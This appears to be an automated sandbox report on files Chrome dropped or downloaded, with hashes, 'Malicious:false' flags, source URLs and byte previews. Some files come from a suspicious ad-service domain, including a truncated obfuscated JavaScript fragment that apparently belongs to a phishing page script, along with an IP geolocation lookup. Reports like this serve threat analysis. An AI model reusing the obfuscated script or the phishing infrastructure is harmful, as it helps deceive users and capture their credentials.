                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 17:12:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2677
                                                                                                                                      Entropy (8bit):3.9999334541463556
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8rdoTM0UHIidAKZdA1TehDiZUkwqehMy+R:8yfm2y
                                                                                                                                      MD5:4333A4646356A8352E5495174A84EC7E
                                                                                                                                      SHA1:B3665A95E3183DC29E5CED2D83D9552E1887F584
                                                                                                                                      SHA-256:04F0AE7AF254DC8954E11130372C4FE6D8F01FB3CD3B83A172781606129A7219
                                                                                                                                      SHA-512:F3FADAC314D71E89F45C8EF713404F54834F1EE8DB0D9EFC049CBC92EB156F272E7D973E5B2054C6F0C97DE7635BD9768C90CCBF75A94A51EC9AD30EF13DD965
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. ...$+.,....~-.Js...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 17:12:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2677
                                                                                                                                      Entropy (8bit):3.990898432371629
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8udoTM0UHIidAKZdA1dehBiZUk1W1qehiy+C:85fG9Cy
                                                                                                                                      MD5:19F9605BE35819E127F4BBFA006ECD97
                                                                                                                                      SHA1:7ECAF7506AC70258664F406076C3B83230EAC219
                                                                                                                                      SHA-256:EDB7A0A23A5D769ACA59E3A02C1F6F023F27110A97C8771C373AE34A4B8957B4
                                                                                                                                      SHA-512:B942C53FEC7427857662F579B1DFF6A1DCA89D78C13345B8797859DCEB6D50452E1B8D3406BB27F77BD95E554D6913BD85C4C1F5305C442C6F7CAC30E5ABE8AB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. ...$+.,.......Js...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 17:12:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2679
                                                                                                                                      Entropy (8bit):4.002077561289589
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8ZdoTM0UHIidAKZdA1duTeehOuTbbiZUk5OjqehOuTbEy+yT+:88f8TfTbxWOvTbEy7T
                                                                                                                                      MD5:22B56810F54BC23260B62B86B23040CA
                                                                                                                                      SHA1:50BC9368452486BAC026FC6092E3DDDC8B15DC6C
                                                                                                                                      SHA-256:B45EF06396C9B3B3CEB775D66EA36F0DC353FF1459E4FEA21D619AFA41527901
                                                                                                                                      SHA-512:18271EE081D793E13C88E64E6C3BDBC0CCE7BC742A3E4A58A42778A1AAAE29CE4EDC539931DD80FEA460E4FAA7BEEC8D195802868207C39943E17558B29FB5B8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. ...$+.,.......Js...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):268
                                                                                                                                      Entropy (8bit):5.111190711619041
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                      MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                      SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                      SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                      SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 90 x 33, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61
                                                                                                                                      Entropy (8bit):4.068159130770306
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:yionv//thPlklOd/lhBxl/k4E08up:6v/lhP6Ol7B7Tp
                                                                                                                                      MD5:8864FF0527868F80E145735B3CBFAD41
                                                                                                                                      SHA1:729190ADE23AB9C92CC50D1FBBA75C0EE26F5404
                                                                                                                                      SHA-256:8E80470BBD3E90966EBC80546A0DE4208037410975145177219646886E614A6B
                                                                                                                                      SHA-512:42D74D85BD4FE17A672B05904EA2E7AF807ED27E9407E3649CFF43047D6879389D44E919B1E10ACBBB0563AF230CC45B99A82C8929EB261E92515FBAFE5DAAFC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...Z...!....../+W....IDAT.....$.....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):778
                                                                                                                                      Entropy (8bit):4.7119279238852165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:flsOP14yF1l/zHoaNOU4/c/UddFB6MrYs/m7kr2vWVmrhN2AptAv9VVZtC:NVP14Q1ZHoaNO3X/mor2qmrhN2sAv9jC
                                                                                                                                      MD5:4EF28437E6F32DCD7A79B378819ADDD2
                                                                                                                                      SHA1:0EB2272FABFF5180FFFCE9CDF246A82A695EBDAF
                                                                                                                                      SHA-256:88797383BD4CB091B0A28E07DEBC96F4454412408883C71F52638B240206FB1F
                                                                                                                                      SHA-512:0D6EDEC92AE8A2694F23BF574910741330FCA6DDE595B1DE58346F74C91FE765DA30D78E362E55473F7CA55842A31A3F6504F32A77AA7470A62A674CA2F35E90
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{. "ip": "81.181.60.92",. "network": "81.181.60.0/24",. "version": "IPv4",. "city": "Seattle",. "region": "Washington",. "region_code": "WA",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "98105",. "latitude": 47.6633,. "longitude": -122.3022,. "timezone": "America/Los_Angeles",. "utc_offset": "-0700",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS212238",. "org": "Datacamp Limited".}
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1400
                                                                                                                                      Entropy (8bit):7.808470583085035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                                                                                                      MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                                                                                      SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                                                                                      SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                                                                                      SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230
                                                                                                                                      Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):61
                                                                                                                                      Entropy (8bit):3.990210155325004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):231
                                                                                                                                      Entropy (8bit):6.725074433303473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                                                                                                      MD5:547988BAC5584B4608466D761E16F370
                                                                                                                                      SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                                                                                      SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                                                                                      SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):315
                                                                                                                                      Entropy (8bit):5.0572271090563765
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                                                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                                                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                                                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                                                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://telefornication.com/favicon.ico
                                                                                                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):93276
                                                                                                                                      Entropy (8bit):7.997636438159837
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                                                                      MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                      SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                      SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                      SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/efe0FwcSrW02P356lNUUbLQa82mn100
                                                                                                                                      Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):270
                                                                                                                                      Entropy (8bit):4.840496990713235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                      MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                      SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                      SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                      SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):35970
                                                                                                                                      Entropy (8bit):7.989503040923577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                                                                      MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                      SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                      SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                      SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/12WoOwl2EBsyE56UvkVt2kJop49
                                                                                                                                      Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):778
                                                                                                                                      Entropy (8bit):4.7119279238852165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:flsOP14yF1l/zHoaNOU4/c/UddFB6MrYs/m7kr2vWVmrhN2AptAv9VVZtC:NVP14Q1ZHoaNO3X/mor2qmrhN2sAv9jC
                                                                                                                                      MD5:4EF28437E6F32DCD7A79B378819ADDD2
                                                                                                                                      SHA1:0EB2272FABFF5180FFFCE9CDF246A82A695EBDAF
                                                                                                                                      SHA-256:88797383BD4CB091B0A28E07DEBC96F4454412408883C71F52638B240206FB1F
                                                                                                                                      SHA-512:0D6EDEC92AE8A2694F23BF574910741330FCA6DDE595B1DE58346F74C91FE765DA30D78E362E55473F7CA55842A31A3F6504F32A77AA7470A62A674CA2F35E90
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://ipapi.co/81.181.60.92/json/
                                                                                                                                      Preview:{. "ip": "81.181.60.92",. "network": "81.181.60.0/24",. "version": "IPv4",. "city": "Seattle",. "region": "Washington",. "region_code": "WA",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "98105",. "latitude": 47.6633,. "longitude": -122.3022,. "timezone": "America/Los_Angeles",. "utc_offset": "-0700",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS212238",. "org": "Datacamp Limited".}
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):109447
                                                                                                                                      Entropy (8bit):5.202931520634447
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:4iw5DZ5Mp2uCTtRJtG5DYg5MPV5DRAQDg5MmGHNVX01TV2:4iwxrrpQGH3X0v2
                                                                                                                                      MD5:6FA824258E75FC1AA9FE70E01F42C103
                                                                                                                                      SHA1:D300AE28C77583E3C987994189874FF678C13581
                                                                                                                                      SHA-256:EE735A7D85B57253E54CA248BF2B2856BCFC03F5D2043AC86DFCF90E404601EE
                                                                                                                                      SHA-512:E72004FC9A3AFD7D5A1B620A3580E57D0EEBCA03A2270A54C5C749924E58746B0823EBF06AE10E91B3FF0DC929530535DB429C1A0E0C18E7EB0BDBCEC29C7FFD
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/34XulaQandSR5aTPghBsor84ndx89103
                                                                                                                                      Preview:const _0x146162=_0x487c;(function(_0x4db690,_0xbf335f){const _0x32316e=_0x487c,_0x317f2a=_0x4db690();while(!![]){try{const _0x39212f=parseInt(_0x32316e(0x14e))/0x1*(-parseInt(_0x32316e(0x1f0))/0x2)+parseInt(_0x32316e(0xa5))/0x3+-parseInt(_0x32316e(0xf3))/0x4+-parseInt(_0x32316e(0xb3))/0x5+-parseInt(_0x32316e(0xaf))/0x6+parseInt(_0x32316e(0x123))/0x7*(parseInt(_0x32316e(0x19d))/0x8)+parseInt(_0x32316e(0xdf))/0x9;if(_0x39212f===_0xbf335f)break;else _0x317f2a['push'](_0x317f2a['shift']());}catch(_0x14f974){_0x317f2a['push'](_0x317f2a['shift']());}}}(_0x1559,0xdef7b));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x146162(0xbb)]('sections')[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xb9));document['getElementById'](_0x146162(0x208))&&!document[_0x146162(0xbb)](_0x146162(0x208))[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xc2));document[_0x146162(0x12e)]('keyup',function(_0x2e5733){const _0x5eece2
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7390
                                                                                                                                      Entropy (8bit):4.02755241095864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                      MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                      SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                      SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
